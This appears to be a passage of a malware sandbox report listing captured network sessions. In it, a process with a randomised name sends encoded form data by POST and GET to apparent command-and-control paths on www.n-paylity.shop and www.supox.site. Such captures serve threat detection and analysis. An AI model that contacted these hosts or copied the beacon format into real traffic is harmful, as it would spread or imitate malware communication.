                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: X_CACHE_KEY=77dc533e59e42f73c05af19411f726b6; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqQkCZDZlqjotnVSli0SrhIBkyJZrfys%2Bg3CqZCbGlTLAeytGpF6twqYB6PxcP3pXVjxTnO%2BpDUZhLWZrRHOWbfwnF1Q%2FlbeId%2FgJhBDbhSZcLiPLZDh%2B2vXS1nbWi8AvyyUZA8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f17bb8f7e7c99-EWR
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                                                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.990888119 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    22192.168.2.550007104.21.42.219803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:53.576061010 CEST836OUTPOST /bk4m/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.n-paylity.shop
                                                                                                                                                                                                                                    Origin: http://www.n-paylity.shop
                                                                                                                                                                                                                                    Referer: http://www.n-paylity.shop/bk4m/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 77 63 48 65 4c 70 4b 39 64 4d 5a 32 35 43 36 62 4a 6b 44 67 4a 2f 59 31 54 78 6f 73 45 61 50 69 35 51 66 77 6a 53 43 54 6b 6f 45 6b 75 58 54 71 30 70 74 74 74 50 2f 77 68 79 77 36 45 2b 43 63 52 76 58 4a 4c 6d 6d 6e 77 33 39 6b 77 45 30 4a 7a 66 6e 6a 72 6a 4a 69 67 37 7a 49 37 61 47 5a 4f 74 4d 6b 61 34 74 5a 6e 54 38 56 69 78 76 69 41 2f 45 36 6a 34 6a 64 2f 38 64 58 37 63 72 30 65 79 63 62 6d 4a 35 30 50 6a 2b 58 74 6e 4b 45 46 35 6e 57 62 62 53 50 52 31 63 6c 51 41 74 37 6a 6c 56 30 36 4a 33 32 61 4c 52 6a 51 59 4a 35 75 46 4d 43 7a 5a 52 49 51 76 6e 59 56 4c 48 6b 44 58 4f 4e 42 73 67 52 46 4b 69 77 64 76 50 6f 59 4d 55 45 76 4e 36 44 32 79 64 32
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=wcHeLpK9dMZ25C6bJkDgJ/Y1TxosEaPi5QfwjSCTkoEkuXTq0ptttP/whyw6E+CcRvXJLmmnw39kwE0JzfnjrjJig7zI7aGZOtMka4tZnT8VixviA/E6j4jd/8dX7cr0eycbmJ50Pj+XtnKEF5nWbbSPR1clQAt7jlV06J32aLRjQYJ5uFMCzZRIQvnYVLHkDXONBsgRFKiwdvPoYMUEvN6D2yd2
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:54.548753977 CEST881INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:54 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: X_CACHE_KEY=3f65d260df71e3f0c3e1a8bfc7229305; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ubVGFdSoGrzSt0lBmkYECZ%2Ba6kO3ciTerjsPku%2BMgGcQQ5L3DxR93lx8EQIwhBlweQzrBEJ5mROUxDiVtv%2FlyYagLwaT9j5DXx5UFLWebonVZi6Tb%2FhLnMVUu3QdBZclpPDZ%2B8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f17cb9942726f-EWR
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    23192.168.2.550008104.21.42.219803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:56.443002939 CEST1853OUTPOST /bk4m/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.n-paylity.shop
                                                                                                                                                                                                                                    Origin: http://www.n-paylity.shop
                                                                                                                                                                                                                                    Referer: http://www.n-paylity.shop/bk4m/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 77 63 48 65 4c 70 4b 39 64 4d 5a 32 35 43 36 62 4a 6b 44 67 4a 2f 59 31 54 78 6f 73 45 61 50 69 35 51 66 77 6a 53 43 54 6b 6f 4d 6b 76 6b 62 71 6c 2b 35 74 69 76 2f 77 36 79 77 37 45 2b 43 42 52 76 50 4e 4c 6d 72 61 77 31 46 6b 78 69 67 4a 78 75 6e 6a 2b 54 4a 69 74 62 7a 46 78 36 47 4d 4f 74 38 67 61 38 42 5a 6e 54 38 56 69 7a 33 69 41 74 73 36 77 49 6a 61 6f 4d 64 4c 78 4d 72 63 65 79 6b 4c 6d 4a 39 65 4f 54 65 58 74 44 57 45 41 4c 2f 57 53 62 53 4e 63 56 63 4c 51 42 51 72 6a 6d 77 46 36 4e 33 49 61 4a 52 6a 53 64 55 32 30 56 34 71 6f 62 39 43 41 73 76 70 50 50 4c 59 50 31 2b 4c 4e 39 59 5a 5a 4a 4f 6c 65 5a 36 75 53 64 70 42 34 37 47 4e 7a 56 35 33 6d 61 34 4e 35 50 45 30 55 43 78 53 4c 55 6b 57 73 59 6c 51 6d 38 58 38 70 48 64 33 38 71 52 76 6e 75 58 42 4c 49 35 61 4a 46 70 2f 38 79 4b 4e 77 64 68 6b 58 34 4e 67 58 33 55 63 73 4c 5a 4e 47 44 62 6a 59 31 59 39 6d 33 52 65 2f 55 68 33 54 70 51 49 32 68 42 61 42 79 53 53 44 51 55 75 2f 56 36 67 78 72 4d 76 79 51 73 54 33 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=wcHeLpK9dMZ25C6bJkDgJ/Y1TxosEaPi5QfwjSCTkoMkvkbql+5tiv/w6yw7E+CBRvPNLmraw1FkxigJxunj+TJitbzFx6GMOt8ga8BZnT8Viz3iAts6wIjaoMdLxMrceykLmJ9eOTeXtDWEAL/WSbSNcVcLQBQrjmwF6N3IaJRjSdU20V4qob9CAsvpPPLYP1+LN9YZZJOleZ6uSdpB47GNzV53ma4N5PE0UCxSLUkWsYlQm8X8pHd38qRvnuXBLI5aJFp/8yKNwdhkX4NgX3UcsLZNGDbjY1Y9m3Re/Uh3TpQI2hBaBySSDQUu/V6gxrMvyQsT3GF4+OPUIUTA3RlbrK0FI9uqHl17lB93hZ872yTC/Ca0qLBnfxWsvU466Ub3eC9GnB6ZnQc9UIAeuRaTO8wsWcjCrsTNP/zrDbg28Zbmv2zB20RoVuhnP1szGweJ/2lhrxzI/iJjJgaJ4WuzAepJlnj87TCUc71c7uJCxdF6wVnM4Lmu85Oyy4Qdhi4tKFNii2IGFz1nBRSYGRgByFl1PAiDjyIbC8PPOXzf3D76ibgRsLOlt8Pwzf0/bNFspOi+ahzIB3ol33dqfV1Gs5oezqbiIfsViLDBW0d8epccJNrAij/HTJkdDXIevxFET/5E9P+wX7xbDc1FJMPh7So5OoFJtaVVt1fYnxlA5UA0hxBs10sQ4ApWyegJuAH3kh1fWxJ7oY8wQ0yggELT3kM8Lq5CHprY9BbA/tQ7qCQSlnhrnXZvjaJg4NwlEm4HQRNfbhn158rZDLpPBlB2d1s8pnHr+lsI6BX1TLLCG2tH1eWiuegASQV0hHelrQHPS75sMFAXT0CtqMFird45Xy0dl9bpIGMAVT2YQIFmS6m2Q/MUBZc4jLw05rVQUx5m7arUsh05oX47hBjjfkhmn8az8bd2BSNRpXmXE04cs6jPdpA6XRfhn+1ZE+FK8xmLEGurcOkf4WHm/5fjtoJLHx9csIe/lEv8LI5Otvp [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.283760071 CEST881INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:57 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: X_CACHE_KEY=b694735f45275bfcb0c061e26b966d7d; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p23OAMjux1d1BeP4qe7H2m9MpW%2F5elJDZJymMssUdiIihXySIvOqBjGPFV%2B%2F%2B5FX3ecWHrAoDiBFouuQ9jo4X9hrJ6JNg4CK%2FAGwk6T6ULfzaVc6Rgml2QHeZT0SldST3YC0dXw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f17dd4dc64331-EWR
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    24192.168.2.550009104.21.42.219803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.976104021 CEST556OUTGET /bk4m/?BHNhDJjp=9ev+IdmnT8REph2CGzrIJ/IsR1IBIoPEgwjA7hGEn4o4y1K06O5g5/jYrWQAF7mhR86KKy+6wQgfy24A0MXqjVprhsrq1Iq/McMaN4BLomsWsjrPI4172Mamgtp349unMg==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.n-paylity.shop
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855504990 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:59 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: X_CACHE_KEY=3be2390be999b7acd99030b3303a8b88; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPA%2Fg4b%2F4N57VuXMR7ZZW0Ydh59DGZ9gtkgYS3va18%2B99wVCdc40HMqkFP%2FKBwLuHggSTJOoNM02kcjDfa9aZLqhPVA6eBBDv%2FO%2BkdTLcOWIzZk8jijMm103Sl9xZ8gu6i54%2B%2F0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f17ed2d35191e-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disa
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855571985 CEST52INData Raw: 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ble MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    25192.168.2.550010162.0.225.218803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.907160044 CEST804OUTPOST /ksch/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.supox.site
                                                                                                                                                                                                                                    Origin: http://www.supox.site
                                                                                                                                                                                                                                    Referer: http://www.supox.site/ksch/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 45 2b 4e 54 54 74 2f 73 50 5a 32 4d 71 68 66 64 6d 37 4b 66 63 38 4d 58 5a 4f 32 6a 6a 62 42 32 55 6a 2b 55 46 50 6d 7a 73 42 4d 49 66 6c 76 49 4e 30 38 50 75 34 75 72 4c 4e 72 35 32 47 68 33 2f 2b 6b 6d 4c 41 43 76 4b 6f 62 5a 6d 6d 53 2f 2f 2b 71 69 74 57 4d 39 66 41 73 52 76 34 7a 4b 4c 45 72 67 30 33 33 5a 44 35 2b 52 4d 65 39 33 64 4f 2f 67 45 64 78 73 45 51 32 74 30 56 42 56 34 54 49 5a 65 69 76 45 47 77 4c 2b 59 53 42 2b 54 56 52 52 65 58 51 45 6f 35 37 70 51 32 2f 36 43 54 49 63 41 6d 68 4f 4c 4b 38 6a 62 66 53 4a 4e 77 2f 56 4c 75 56 4f 78 71 61 45 59 73 31 70 64 69 6e 4c 6a 64 51 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=E+NTTt/sPZ2Mqhfdm7Kfc8MXZO2jjbB2Uj+UFPmzsBMIflvIN08Pu4urLNr52Gh3/+kmLACvKobZmmS//+qitWM9fAsRv4zKLErg033ZD5+RMe93dO/gEdxsEQ2t0VBV4TIZeivEGwL+YSB+TVRReXQEo57pQ2/6CTIcAmhOLK8jbfSJNw/VLuVOxqaEYs1pdinLjdQ=
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:05.517242908 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:05 GMT
                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                    Content-Length: 389
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    26192.168.2.550011162.0.225.218803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.447925091 CEST824OUTPOST /ksch/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.supox.site
                                                                                                                                                                                                                                    Origin: http://www.supox.site
                                                                                                                                                                                                                                    Referer: http://www.supox.site/ksch/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 45 2b 4e 54 54 74 2f 73 50 5a 32 4d 77 41 76 64 6e 64 43 66 58 38 4d 55 57 75 32 6a 71 37 42 79 55 6a 36 55 46 4f 54 32 73 33 63 49 47 48 6e 49 44 56 38 50 74 34 75 72 66 64 72 67 34 6d 68 43 2f 2b 67 75 4c 42 75 76 4b 73 7a 5a 6d 6d 43 2f 2f 4d 43 68 74 47 4d 2f 55 67 73 54 72 34 7a 4b 4c 45 72 67 30 33 7a 6e 44 34 57 52 4d 74 56 33 50 2f 2f 6a 4f 39 78 72 46 51 32 74 77 56 42 52 34 54 49 76 65 6a 44 69 47 79 7a 2b 59 53 78 2b 54 42 6c 65 58 58 51 47 31 70 36 44 66 56 6e 71 41 56 4d 68 42 46 31 50 4b 6f 49 44 58 4a 2f 6a 58 53 33 39 59 4f 35 32 68 35 53 7a 4a 63 55 41 48 42 33 37 39 4b 48 71 77 33 69 73 79 52 5a 4f 36 73 6e 70 41 66 53 4d 45 53 56 49
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=E+NTTt/sPZ2MwAvdndCfX8MUWu2jq7ByUj6UFOT2s3cIGHnIDV8Pt4urfdrg4mhC/+guLBuvKszZmmC//MChtGM/UgsTr4zKLErg03znD4WRMtV3P//jO9xrFQ2twVBR4TIvejDiGyz+YSx+TBleXXQG1p6DfVnqAVMhBF1PKoIDXJ/jXS39YO52h5SzJcUAHB379KHqw3isyRZO6snpAfSMESVI
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.064826965 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:07 GMT
                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                    Content-Length: 389
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Content-Type: text/html
